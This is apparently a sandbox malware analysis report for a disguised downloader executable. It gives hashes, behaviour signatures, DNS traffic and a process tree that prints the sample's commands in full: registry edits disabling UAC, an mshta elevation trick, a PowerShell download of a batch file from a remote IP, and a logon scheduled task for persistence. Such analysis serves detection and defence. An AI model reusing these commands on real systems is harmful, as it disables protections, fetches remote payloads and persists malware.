Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    12/06/2024, 11:23 UTC

General

  • Target

    pornhub_downloader.exe

  • Size

    88KB

  • MD5

    759f5a6e3daa4972d43bd4a5edbdeb11

  • SHA1

    36f2ac66b894e4a695f983f3214aace56ffbe2ba

  • SHA256

    2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

  • SHA512

    f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2175.tmp\2176.tmp\2177.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
          "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2360
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\229E.tmp\229F.tmp\22A0.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2708
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2992
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2688
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2380
              • C:\Windows\SysWOW64\reg.exe
                reg query HKEY_CLASSES_ROOT\http\shell\open\command
                7⤵
                  PID:2672
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2556
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:275457 /prefetch:2
                  7⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2728
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +h d:\net
                6⤵
                • Sets file to hidden
                • Views/modifies file attributes
                PID:2576
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:860
              • C:\Windows\SysWOW64\schtasks.exe
                SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                6⤵
                • Creates scheduled task(s)
                PID:1712

    Network

    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    • flag-us
      DNS
      www.pornhub.com
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.pornhub.com
      IN A
    No results found
    • 8.8.8.8:53
      www.pornhub.com
      dns
      IEXPLORE.EXE
      305 B
      5

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

    • 8.8.8.8:53
      www.pornhub.com
      dns
      IEXPLORE.EXE
      305 B
      5

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

    • 8.8.8.8:53
      www.pornhub.com
      dns
      IEXPLORE.EXE
      305 B
      5

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

      DNS Request

      www.pornhub.com

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\2175.tmp\2176.tmp\2177.bat

      Filesize

      1KB

      MD5

      9856d2fe29a28c54c5943c2150f7bae1

      SHA1

      f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

      SHA256

      0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

      SHA512

      002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.